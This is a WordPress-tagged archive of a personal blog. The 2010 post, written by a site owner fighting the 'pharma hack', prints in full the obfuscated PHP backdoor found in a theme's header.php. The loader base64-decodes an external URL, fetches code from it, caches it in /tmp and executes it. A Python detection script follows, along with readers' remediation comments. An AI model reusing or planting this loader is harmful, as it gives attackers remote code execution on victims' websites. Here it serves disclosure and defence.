Tagged: wordpress

  • Stef 10:20 pm on 23 May, 2012
    Tags: p2, theme, wordpress   

    P2 theme from Automattic is awesome. I’m giving it a spin, looks great so far.

     
  • Stef 10:33 am on 6 August, 2010
    Tags: crack, pharmahack, wordpress   

    Getting busy on the blog for the wrong reasons 

    I’ve been spending lots of time on this blog but not for good reasons. I’m currently under the attack of the nasty pharma hack and I can’t get things to work. I still haven’t identified the backdoor used to enter my WordPress installation. I’ve done all the necessary steps: cleaned the database, removed the offending files, removed the first source of entry, upgraded WP and all plugins + themes I use. I changed the FTP password and database passwords for all three sites I manage on this hosting platform. I did this three times already. Still, every day I get a notification from WP File Monitor that the SOB has modified some files. If anybody has pointers useful to identify the entry point for this cracker please let me know.

    UPDATE: I think I found the backdoor that the bastard is using. It was in the header.php of one of the templates:

    <?php /* system_remote_fopen procedure */ $er=error_reporting(0); $f_sys_remote_fopen=create_function(‘$uri’,'$_url=@parse_url($uri); if(!$_url || !is_array($_url)) return false; if(!isset($_url["scheme"]) || !in_array($_url["scheme"],array(“http”,”https”))) $uri=”http://”.$uri; if(function_exists(“curl_init”)){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$uri); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $txt=curl_exec($ch); curl_close($ch); return $txt; }elseif(function_exists(“fsockopen”)){ $f=@fsockopen($_url["host"],80,$errno,$errstr,5); @stream_set_timeout($f,10); if($f){ $s=”GET $uri HTTP/1.0\r\nHost: “.$_url["host"].”\r\nConnection: Close\r\n\r\n”; @fwrite($f,$s); $txt=”"; while(!feof($f)) $txt.=@fgets($f,128); $txt=trim($txt); } @fclose($f); return substr($txt,strpos($txt,”\r\n\r\n”)+4); }elseif(@ini_get(“allow_url_fopen”)){ @ini_set(“default_socket_timeout”,10); $fp=@fopen($uri,”r”); if(!$fp) return false; $txt=”"; while($ln=@fread($fp,4096)) $txt.=$ln; @fclose($fp); return $txt; }else return “”;’); $sys_remote_fopen=’aHR0cDovL2luY29tZWluLm5ldC8=’; $opt_id=’4f66ac83efc3ebdc05a18f757f30f875′; $sess=@file_get_contents(‘/tmp/sess_’.md5($opt_id)); $_sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.md5′)); if($_sess!=”" && $_sess!=md5($sess)){ $sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.txt’)); $fh=@fopen(“/tmp/sess_”.md5($opt_id),”w+”); @fwrite($fh,$sess); @fclose($fh); } $sess=@unserialize(@base64_decode($sess)); if($sess && $sess['uptime']!=”"){ unset($sess_f); $sess_f=create_function(“\$a”,$sess['uptime']); $sess_f(&$sess); } error_reporting($er); /* system_remote_fopen procedure */ ?>

    Let’s see how long this lasts.
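
As an added example (not code from the original post), a small Python triage script that scores PHP files on the traits visible in the header.php sample above. The indicator names, the threshold of 3 and the constructed `SAMPLE` string with its placeholder URL are assumptions made for illustration.

```python
import base64
import re
from pathlib import Path

# Traits visible in the header.php sample; one alone is weak, several together
# in a single theme file warrant manual review.
INDICATORS = {
    "error_reporting_off": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "unserialize_of_base64": re.compile(r"unserialize\s*\(\s*@?base64_decode\s*\("),
    "tmp_sess_file": re.compile(r"/tmp/sess_"),
    "remote_fetch": re.compile(r"\b(curl_exec|fsockopen)\s*\("),
}
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")


def hides_url(source):
    """True if a quoted base64 literal decodes to an http(s) URL."""
    for literal in B64_LITERAL.findall(source):
        try:
            decoded = base64.b64decode(literal, validate=True)
        except ValueError:  # not valid base64 (binascii.Error subclasses it)
            continue
        if decoded.startswith((b"http://", b"https://")):
            return True
    return False


def score_php(source):
    """Sorted names of the indicators present in one PHP source string."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    if hides_url(source):
        hits.append("base64_encoded_url")
    return sorted(hits)


def scan_tree(root, threshold=3):
    """Map each .php file under root with >= threshold indicators to its hits."""
    return {
        str(p): hits
        for p in Path(root).rglob("*.php")
        if len(hits := score_php(p.read_text(errors="replace"))) >= threshold
    }


# Constructed sample shaped like the injected code (placeholder URL, not the original).
_B64 = base64.b64encode(b"http://example.invalid/").decode()
SAMPLE = ("<?php $er=error_reporting(0); $f=create_function('$u','return 1;');"
          f" $src='{_B64}'; $s=@unserialize(@base64_decode($sess)); ?>")
```

Run `scan_tree()` against the `wp-content` directory and review every reported file by hand; a clean theme file normally trips at most one of these indicators.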

     
    • Jeff 10:46 pm on 30 August, 2010

      Any news on your latest development? I’m anxious to fix this problem on my WordPress install.

      Thanks!

    • Jeff 7:10 pm on 5 September, 2010

      Well, I think I finally fixed it. I’ve done most of the security-related modifications to my WP install in the past, but the hack continued to find its way in. Finally I renamed the database tables and password protected the wp-admin directory, and that is what’s put an end to the problem for me.

  • Stef 9:11 pm on 8 February, 2008
    Tags: wordpress

    Upgraded WordPress, closing the week

    This WordPress needed some maintenance, but this time instead of upgrading ‘manually’ I decided to use the WordPress Automatic Upgrade Plugin: boy, it was fast and simple. It seems to be working fine. If you spot any glitches let me know. Now for me it’s time to go play with the RC minihelicopter and away from computers.

    Tomorrow I’ll meet Hal in person for the first time at Malpensa while he is flying to Barcelona for the MWC: I’ll take pictures :)

     
  • Stef 1:03 pm on 30 November, 2007
    Tags: fund raising, wordpress

    Small changes to the blog 

    I’ve started the new tag system offered by WordPress 2.3.1 a few weeks ago and I’ve also stopped using the categories. I left them on because I didn’t want to change the archives. I’m still looking for a way to deal with dual language posts: WordPress seems not to support natively multiple languages (we talked at the Cena Lunga about this with Giacomo and LK). I thought of using different categories, it and eng, but I’m not sure how to achieve separate feeds. Gengo seems too complicated and doesn’t work on 2.3.1 anyway, other solutions I found seem abandoned. Does anybody know of a *stable* solution to mark posts as Italian or English, offering two separate feeds?

    While I was playing with WP I’ve added two new widgets: one from twitter (more freaky experimenting with social networks) and the new FSF fund raising widget. Put it on your blog too and give yourself a nice Christmas present donating to FSF. Did you know they have also a fund to support the defense of poor moms and kids against the RIAA lawsuits?

     